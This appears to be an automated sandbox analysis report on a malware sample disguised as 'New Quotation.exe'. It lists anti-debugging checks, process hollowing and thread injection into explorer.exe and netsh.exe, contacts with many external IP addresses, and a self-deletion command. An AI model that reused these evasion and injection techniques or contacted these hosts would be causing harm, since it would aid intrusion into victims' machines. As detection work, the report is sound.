      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D898E26 mov eax, dword ptr fs:[00000030h]7_2_1D898E26
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D898E26 mov eax, dword ptr fs:[00000030h]7_2_1D898E26
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D898E26 mov eax, dword ptr fs:[00000030h]7_2_1D898E26
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D866E30 mov eax, dword ptr fs:[00000030h]7_2_1D866E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D866E30 mov eax, dword ptr fs:[00000030h]7_2_1D866E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov eax, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov ecx, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov eax, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov eax, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov eax, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D865E30 mov eax, dword ptr fs:[00000030h]7_2_1D865E30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CE3F mov eax, dword ptr fs:[00000030h]7_2_1D80CE3F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov ecx, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E1EB2 mov eax, dword ptr fs:[00000030h]7_2_1D7E1EB2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84DE50 mov eax, dword ptr fs:[00000030h]7_2_1D84DE50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84DE50 mov eax, dword ptr fs:[00000030h]7_2_1D84DE50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84DE50 mov ecx, dword ptr fs:[00000030h]7_2_1D84DE50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84DE50 mov eax, dword ptr fs:[00000030h]7_2_1D84DE50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84DE50 mov eax, dword ptr fs:[00000030h]7_2_1D84DE50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D880E6D mov eax, dword ptr fs:[00000030h]7_2_1D880E6D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4E62 mov eax, dword ptr fs:[00000030h]7_2_1D8A4E62
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88EE78 mov eax, dword ptr fs:[00000030h]7_2_1D88EE78
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CE70 mov eax, dword ptr fs:[00000030h]7_2_1D80CE70
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D807E71 mov eax, dword ptr fs:[00000030h]7_2_1D807E71
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]7_2_1D7FAE89
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAE89 mov eax, dword ptr fs:[00000030h]7_2_1D7FAE89
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FBE80 mov eax, dword ptr fs:[00000030h]7_2_1D7FBE80
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6970 mov eax, dword ptr fs:[00000030h]7_2_1D7D6970
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80C98F mov eax, dword ptr fs:[00000030h]7_2_1D80C98F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80C98F mov eax, dword ptr fs:[00000030h]7_2_1D80C98F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80C98F mov eax, dword ptr fs:[00000030h]7_2_1D80C98F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E096B mov eax, dword ptr fs:[00000030h]7_2_1D7E096B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E096B mov eax, dword ptr fs:[00000030h]7_2_1D7E096B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8589A0 mov eax, dword ptr fs:[00000030h]7_2_1D8589A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F4955 mov eax, dword ptr fs:[00000030h]7_2_1D7F4955
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F4955 mov eax, dword ptr fs:[00000030h]7_2_1D7F4955
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov eax, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov ecx, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov eax, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov eax, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov eax, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB950 mov eax, dword ptr fs:[00000030h]7_2_1D7DB950
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85F9AA mov eax, dword ptr fs:[00000030h]7_2_1D85F9AA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85F9AA mov eax, dword ptr fs:[00000030h]7_2_1D85F9AA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8089B0 mov edx, dword ptr fs:[00000030h]7_2_1D8089B0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FE94E mov eax, dword ptr fs:[00000030h]7_2_1D7FE94E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FD940 mov eax, dword ptr fs:[00000030h]7_2_1D7FD940
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FD940 mov eax, dword ptr fs:[00000030h]7_2_1D7FD940
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85D9C7 mov eax, dword ptr fs:[00000030h]7_2_1D85D9C7
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A29CF mov eax, dword ptr fs:[00000030h]7_2_1D8A29CF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A29CF mov eax, dword ptr fs:[00000030h]7_2_1D8A29CF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F9938 mov ecx, dword ptr fs:[00000030h]7_2_1D7F9938
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CB931 mov eax, dword ptr fs:[00000030h]7_2_1D7CB931
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CB931 mov eax, dword ptr fs:[00000030h]7_2_1D7CB931
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88D9C6 mov eax, dword ptr fs:[00000030h]7_2_1D88D9C6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8799D6 mov ecx, dword ptr fs:[00000030h]7_2_1D8799D6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7917 mov eax, dword ptr fs:[00000030h]7_2_1D7C7917
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8049F0 mov eax, dword ptr fs:[00000030h]7_2_1D8049F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8049F0 mov eax, dword ptr fs:[00000030h]7_2_1D8049F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FB9FA mov eax, dword ptr fs:[00000030h]7_2_1D7FB9FA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C99F0 mov ecx, dword ptr fs:[00000030h]7_2_1D7C99F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D09F0 mov eax, dword ptr fs:[00000030h]7_2_1D7D09F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D826912 mov eax, dword ptr fs:[00000030h]7_2_1D826912
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802919 mov eax, dword ptr fs:[00000030h]7_2_1D802919
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802919 mov eax, dword ptr fs:[00000030h]7_2_1D802919
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D805921 mov eax, dword ptr fs:[00000030h]7_2_1D805921
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D805921 mov ecx, dword ptr fs:[00000030h]7_2_1D805921
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D805921 mov eax, dword ptr fs:[00000030h]7_2_1D805921
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D805921 mov eax, dword ptr fs:[00000030h]7_2_1D805921
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84C920 mov ecx, dword ptr fs:[00000030h]7_2_1D84C920
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84C920 mov eax, dword ptr fs:[00000030h]7_2_1D84C920
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84C920 mov eax, dword ptr fs:[00000030h]7_2_1D84C920
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84C920 mov eax, dword ptr fs:[00000030h]7_2_1D84C920
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89892E mov eax, dword ptr fs:[00000030h]7_2_1D89892E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89892E mov eax, dword ptr fs:[00000030h]7_2_1D89892E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A492D mov eax, dword ptr fs:[00000030h]7_2_1D8A492D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FD9CE mov eax, dword ptr fs:[00000030h]7_2_1D7FD9CE
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D82693A mov eax, dword ptr fs:[00000030h]7_2_1D82693A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D82693A mov eax, dword ptr fs:[00000030h]7_2_1D82693A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D82693A mov eax, dword ptr fs:[00000030h]7_2_1D82693A
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB9C0 mov eax, dword ptr fs:[00000030h]7_2_1D7DB9C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DB9C0 mov eax, dword ptr fs:[00000030h]7_2_1D7DB9C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D89C0 mov eax, dword ptr fs:[00000030h]7_2_1D7D89C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D89C0 mov eax, dword ptr fs:[00000030h]7_2_1D7D89C0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80C944 mov eax, dword ptr fs:[00000030h]7_2_1D80C944
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CB9B0 mov eax, dword ptr fs:[00000030h]7_2_1D7CB9B0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89D946 mov eax, dword ptr fs:[00000030h]7_2_1D89D946
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88D947 mov eax, dword ptr fs:[00000030h]7_2_1D88D947
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80C958 mov eax, dword ptr fs:[00000030h]7_2_1D80C958
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DE9A0 mov eax, dword ptr fs:[00000030h]7_2_1D7DE9A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85395B mov eax, dword ptr fs:[00000030h]7_2_1D85395B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85395B mov eax, dword ptr fs:[00000030h]7_2_1D85395B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85395B mov eax, dword ptr fs:[00000030h]7_2_1D85395B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D85488F mov eax, dword ptr fs:[00000030h]7_2_1D85488F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DF870 mov eax, dword ptr fs:[00000030h]7_2_1D7DF870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DF870 mov eax, dword ptr fs:[00000030h]7_2_1D7DF870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E9870 mov eax, dword ptr fs:[00000030h]7_2_1D7E9870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E9870 mov eax, dword ptr fs:[00000030h]7_2_1D7E9870
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80188E mov eax, dword ptr fs:[00000030h]7_2_1D80188E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80188E mov eax, dword ptr fs:[00000030h]7_2_1D80188E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D871889 mov eax, dword ptr fs:[00000030h]7_2_1D871889
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D871889 mov eax, dword ptr fs:[00000030h]7_2_1D871889
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D871889 mov eax, dword ptr fs:[00000030h]7_2_1D871889
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D81088E mov eax, dword ptr fs:[00000030h]7_2_1D81088E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D81088E mov edx, dword ptr fs:[00000030h]7_2_1D81088E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D81088E mov eax, dword ptr fs:[00000030h]7_2_1D81088E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80B890 mov eax, dword ptr fs:[00000030h]7_2_1D80B890
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80B890 mov eax, dword ptr fs:[00000030h]7_2_1D80B890
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80B890 mov eax, dword ptr fs:[00000030h]7_2_1D80B890
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D888890 mov eax, dword ptr fs:[00000030h]7_2_1D888890
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D888890 mov eax, dword ptr fs:[00000030h]7_2_1D888890
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8598B2 mov eax, dword ptr fs:[00000030h]7_2_1D8598B2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FB839 mov eax, dword ptr fs:[00000030h]7_2_1D7FB839
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8918DA mov eax, dword ptr fs:[00000030h]7_2_1D8918DA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8918DA mov eax, dword ptr fs:[00000030h]7_2_1D8918DA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8918DA mov eax, dword ptr fs:[00000030h]7_2_1D8918DA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8918DA mov eax, dword ptr fs:[00000030h]7_2_1D8918DA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CD818 mov eax, dword ptr fs:[00000030h]7_2_1D7CD818
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8048F0 mov eax, dword ptr fs:[00000030h]7_2_1D8048F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CD800 mov eax, dword ptr fs:[00000030h]7_2_1D7CD800
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8688FB mov eax, dword ptr fs:[00000030h]7_2_1D8688FB
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3800 mov eax, dword ptr fs:[00000030h]7_2_1D7E3800
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3800 mov eax, dword ptr fs:[00000030h]7_2_1D7E3800
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3800 mov eax, dword ptr fs:[00000030h]7_2_1D7E3800
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]7_2_1D87F8F8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]7_2_1D87F8F8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]7_2_1D87F8F8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]7_2_1D87F8F8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D87F8F8 mov eax, dword ptr fs:[00000030h]7_2_1D87F8F8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DA8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7DA8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7FD8F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FD8F0 mov eax, dword ptr fs:[00000030h]7_2_1D7FD8F0
      Source: C:\Users\user\Desktop\New Quotation.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812DA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_1D812DA0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 99.83.175.80 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 216.58.212.147 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 93.89.226.17 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.204.133.148 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.220 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.105.250.34 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.219.125.79 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 43.225.157.245 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 176.53.69.151 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 8.214.69.48 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.45.67.192 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 82.98.135.44 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 152.228.155.71 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\New Quotation.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: C20000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\New Quotation.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\New Quotation.exeThread register set: target process: 4924Jump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeThread register set: target process: 4924Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 4924Jump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeProcess created: C:\Users\user\Desktop\New Quotation.exe "C:\Users\user\Desktop\New Quotation.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\New Quotation.exe"Jump to behavior
      Source: explorer.exe, 0000000A.00000000.49394023948.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49346306455.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49448060741.0000000001151000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000000A.00000000.49469621943.000000000CC76000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49351376651.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49416561413.000000000CC76000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000A.00000000.49394023948.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49346306455.0000000001151000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.49448060741.0000000001151000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000A.00000000.49445907336.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49392199120.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.49344806303.0000000000AA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
